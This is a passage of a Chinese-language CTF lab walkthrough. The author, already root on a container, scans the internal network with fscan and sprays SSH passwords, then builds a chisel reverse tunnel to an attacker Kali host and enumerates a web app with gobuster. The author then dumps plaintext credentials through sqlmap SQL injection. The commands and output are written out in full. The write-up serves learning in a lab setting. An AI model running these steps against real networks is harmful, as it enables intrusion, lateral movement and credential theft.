src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240410184118407\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>fscan<\/h3>\n<p>\u626b\u4e00\u4e0b\u5185\u7f51\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# .\/fscan -h 172.20.10.3\/24       # \u9519\u8bef\u4e86\uff0c\u4e0b\u9762\u53d1\u73b0\u4e86\u3002\u3002\u3002\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| &#039;__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.3\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.20.10.3     is alive\n(icmp) Target 172.20.10.8     is alive\n(icmp) Target 172.20.10.1     is alive\n[*] Icmp alive hosts len is: 3\n172.20.10.8:80 open\n172.20.10.3:80 open\n172.20.10.8:22 open\n172.20.10.3:22 open\n172.20.10.1:21 open\n172.20.10.3:21 open\n[*] alive ports len is: 6\nstart vulscan\n[+] ftp 172.20.10.3:21:anonymous \n   [-&gt;]flag.txt\n[*] WebTitle http:\/\/172.20.10.3        code:401 len:458    title:401 Unauthorized\n\u5df2\u5b8c\u6210 3\/6 [-] ssh 172.20.10.3:22 root root@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 root a123456. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 root Aa123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 admin password ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.8:22 admin admin@123#4 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.20.10.3:22 admin a12345 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 6\/6<\/code><\/pre>\n<p>\u4e0d\u9519\u54e6\uff0c\u62ff\u4e00\u4e0b\u8fd9\u4e2aflag\uff0c\u7b49\u4e00\u4e0b\uff0c\u8fd9\u4e0d\u662f\u672c\u673a\u7684ip\u5417\uff0c\u54c8\u54c8\u54c8\u3002<\/p>\n<p>\u7531\u4e8e\u8fd9\u91cc\u64cd\u4f5c\u4e0d\u662f\u5f88\u65b9\u9762\uff0c\u6211\u4eec\u9700\u8981\u67b6\u8bbe\u4e00\u4e2a\u96a7\u9053\u4f9bkali\u8bbf\u95ee\uff0c<code>chisel<\/code>\u4f3c\u4e4e\u662f\u4e00\u4e2a\u4e0d\u9519\u7684\u9009\u62e9\uff0c\u6211\u5728<code>L4nder<\/code>\u5e08\u5085\u7684wp\u770b\u5230\u7684\uff1a<\/p>\n<p>\u5148\u4e0b\u8f7d\u5230\u672c\u673a\uff0c\u7136\u540e\u4f20\u8fc7\u53bb\u3002\u3002\u3002<\/p>\n<p>\u5b83\u7684\u539f\u7406\u56fe\u592a\u597d\u770b\u4e86\uff0c\u8bf7\u770b\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543115.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543115.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"overview\" \/><\/div><\/p>\n<p>\u5927\u6982\u5c31\u662f\u628a\u8fdc\u7a0b\u4e3b\u673a\u7684\u7aef\u53e3\u6620\u5c04\u5230\u672c\u5730\uff1a<\/p>\n<pre><code class=\"language-bash\">sudo apt install chisel    # \u8fd9\u5c31\u4e3a\u4e0b\u9762\u57cb\u4e0b\u4e86\u9690\u60a3<\/code><\/pre>\n<p>\u518d\u4e0b\u8f7d\u4e86\u4e00\u4e2a\u7f51\u4e0a\u7684\u4f20\u5230\u9776\u673a\u4e0a\u53bb\uff1a<\/p>\n<blockquote>\n<p>\u4e3a\u540e\u9762\u72af\u9519\u57cb\u4e0b\u4e86\u9690\u60a3\uff0c\u8fd9\u91cc\u4e3a\u4ec0\u4e48\u6211\u9009\u62e9\u4e0a\u7f51\u518d\u627e\u4e00\u4e2a\uff0c\u56e0\u4e3a\u6211\u5728\u8fd0\u884c\u4e0a\u8ff0\u547d\u4ee4\u65f6\uff0c\u4e0b\u8f7d\u7684\u6587\u4ef6\u5b58\u5728<code>-kali<\/code>\u5b57\u6837\uff0c\u6211\u62c5\u5fc3\u5728\u9776\u673a\u8fd0\u884c\u53ef\u80fd\u5b58\u5728\u95ee\u9898\u3002\u3002\u3002<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543116.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543116.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417004331385\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u4e3b\u673a\u5148\u542f\u52a8\u4f5c\u4e3a\u670d\u52a1\u5668\uff1a<\/p>\n<pre><code class=\"language-bash\">chisel server --reverse -p 2345<\/code><\/pre>\n<p>\u518d\u5728\u9776\u673a\u4e0a\u542f\u52a8\u4f5c\u4e3a\u5ba2\u6237\u7aef\uff0c\u7b49\u4e00\u4e0b\uff0c\u4e0d\u5bf9\u52b2\uff0c\u6211\u672c\u5730\u673a\u5668\u7684ip\u5730\u5740\u548b\u548c\u5185\u7f51\u626b\u51fa\u6765\u7684\u4e00\u6837\u3002\u3002\u3002<\/p>\n<p>\u4f7f\u7528<code>L4nder<\/code>\u5e08\u5085\u7684\u811a\u672c\u9a8c\u8bc1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n\nfunction ctrl_c(){\n    echo -e &quot;\\n\\n[!] Saliendo...\\n&quot;\n    tput cnorm; exit 1\n}\n\n# Ctrl+C\ntrap ctrl_c INT\n\nnetwork=$(hostname -I | cut -d &#039;.&#039; -f 1,2,3)\n\ntput civis\nfor i in $(seq 1 254); do\n    timeout 1 bash -c &quot;ping -c 1 $network.$i&quot; &amp;&gt;\/dev\/null &amp;&amp; echo &quot;[+] HOST $network.$i - ACTIVO&quot; &amp;\ndone; wait\ntput cnorm<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# .\/nmap.sh \n[+] HOST 172.17.0.2 - ACTIVO\n[+] HOST 172.17.0.1 - ACTIVO\n[+] HOST 172.17.0.3 - ACTIVO<\/code><\/pre>\n<p>\u6211\u77e5\u9053\u54ea\u91cc\u9519\u4e86\uff0c\u9776\u673a\u4e0a\u9762\u6ca1\u6709ip\u547d\u4ee4\uff0c\u6240\u4ee5\u6211\u76f4\u63a5\u4f7f\u7528\u4e86\u5916\u7f51ip\u8fdb\u884c\u5185\u7f51\u63a2\u6d4b\uff0c\u6211\u771f\u662fstupid\u3002\u3002\u3002\u3002<\/p>\n<p>\u4e0a\u4f20\u4e00\u4e2abusybox\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# ls\nbusybox  chisel  fscan  nmap.sh\n(remote) root@788ed382e389:\/tmp# chmod +x busybox\n(remote) root@788ed382e389:\/tmp# .\/busybox ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n4: eth0@if5: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff\n    inet 172.17.0.2\/16 brd 172.17.255.255 scope global eth0\n       valid_lft forever preferred_lft forever<\/code><\/pre>\n<p>\u4f7f\u7528fscan\u8fdb\u884c\u5185\u7f51\u63a2\u6d4b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) root@788ed382e389:\/tmp# .\/fscan -h 172.17.0.2\/24\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| &#039;__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.3\nstart infoscan\n(icmp) Target 172.17.0.1      is alive\n(icmp) Target 172.17.0.2      is alive\n(icmp) Target 172.17.0.3      is alive\n[*] Icmp alive hosts len is: 3\n172.17.0.3:80 open\n172.17.0.2:80 open\n172.17.0.1:80 open\n172.17.0.1:22 open\n172.17.0.1:21 open\n172.17.0.3:22 open\n[*] alive ports len is: 6\nstart vulscan\n[*] WebTitle http:\/\/172.17.0.2         code:401 len:457    title:401 Unauthorized\n[*] WebTitle http:\/\/172.17.0.1         code:401 len:457    title:401 Unauthorized\n[+] ftp 172.17.0.1:21:anonymous \n   [-&gt;]flag.txt\n[*] WebTitle http:\/\/172.17.0.3         code:200 len:761    title:&quot;&quot;\n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 root 1qaz@WSX ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.1:22 root Aa12345. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.1:22 admin 111111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 admin 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 4\/6 [-] ssh 172.17.0.3:22 admin qwe123!@# ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 6\/6<\/code><\/pre>\n<p>\u770b\u8d77\u6765<code>172.20.10.3<\/code>\u662f\u6211\u4eec\u9700\u8981\u6253\u7684\u9776\u673a\uff1a<\/p>\n<p>\u7ee7\u7eed\u4e0a\u9762\u7684<code>chisel<\/code>\u96a7\u9053\u5efa\u7acb<\/p>\n<pre><code class=\"language-bash\">.\/chisel client 172.20.10.8:2345 R:22:172.17.0.3:22 R:80:172.17.0.3:80 <\/code><\/pre>\n<h3>\u5185\u7f51\u7a7f\u900f<\/h3>\n<p>\u4f46\u662f\u53d1\u751f\u62a5\u9519\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543117.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543117.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417012009205\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543118.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543118.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417012021789\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u662f\u7248\u672c\u4e0d\u5bf9\u7684\u539f\u56e0\uff0c\u4e24\u8fb9\u540c\u65f6\u4f7f\u7528\u4e00\u4e2a\u76f8\u540c\u7684chisel\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\n.\/chisel server --reverse -p 2345<\/code><\/pre>\n<pre><code class=\"language-bash\"># attacked\n.\/chisel client 172.20.10.8:2345 R:22:172.17.0.3:22 R:80:172.17.0.3:80 <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543119.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543119.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417013629794\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543120.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543120.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417013637966\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53c8\u62a5\u9519\u4e86\u3002\u3002\u3002\u3002\u6362\u4e00\u4e2a\u7aef\u53e3\uff0c\u6210\u529f\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543121.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543121.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014224487\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543122.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543122.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014231831\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543123.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543123.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014304446\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.8:8888\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.8:8888\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              git,jpg,txt,png,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/admin                (Status: 301) [Size: 317] [--&gt; http:\/\/172.20.10.8:8888\/admin\/]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u63a2\u67e5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543124.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543124.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417014548733\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5148\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543125.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543125.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417015000059\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ca1\u6709\u5565\u6709\u7528\u7684\u56de\u663e\u3002<\/p>\n<h3>sql\u6ce8\u5165<\/h3>\n<p>\u8fdb\u884c\u6293\u5305<code>sqlmap<\/code>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-html\">GET \/admin\/index.php?id=1 HTTP\/1.1\nHost: 172.20.10.8:8888\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/172.20.10.8:8888\/admin\/index.php?id=1\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close<\/code><\/pre>\n<p>\u5c45\u7136\u662furl\u8fdb\u884c\u4f20\u9012\u53c2\u6570\u7684\uff0c\u5c1d\u8bd5\u7ed5\u8fc7\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-apl\">?id=1&#039; and 1=1 --+\n?id=1&#039; and 1=2 --+<\/code><\/pre>\n<p>\u4e0a\u9762\u5e38\u5e38\u663e\u793a\uff0c\u4e0b\u9762\u4e0d\u6b63\u5e38\uff0c\u5f88\u597d\uff0c\u7136\u540e\u5c31\u6ca1\u4e86\u3002\u3002\u3002\u3002<\/p>\n<p><code>sqlmap<\/code>\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1 --dbs<\/code><\/pre>\n<pre><code class=\"language-apl\">available databases [3]:\n[*] creds\n[*] example\n[*] information_schema<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1 -D creds --tables<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: creds\n[1 table]\n+-------+\n| users |\n+-------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -u http:\/\/172.20.10.8:8888\/admin\/index.php?id=1 -D creds -T users --dump<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: creds\nTable: users\n[3 entries]\n+-------------------+----------+\n| password          | username |\n+-------------------+----------+\n| beltran48         | marco    |\n| iamoswe2023!      | txhaka   |\n| superrootpassword | root     |\n+-------------------+----------+<\/code><\/pre>\n<p>\u5f3a\u70c8\u5efa\u8bae\u770b\u4e00\u4e0b\u4e00\u5f00\u59cb\u63a8\u8350\u7684\u90a3\u4e2awp\uff0c\u4f7f\u7528\u7684\u5168\u90fd\u662f\u811a\u672c\uff0c\u96be\u4ee5\u8a00\u55bb\u7684\u4f18\u96c5\uff01<\/p>\n<p>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543126.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543126.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417020731545\" \/><\/div><\/p>\n<p>\u5f97\u5230\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-apl\">txhaka\niamoswe2023!<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543127.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 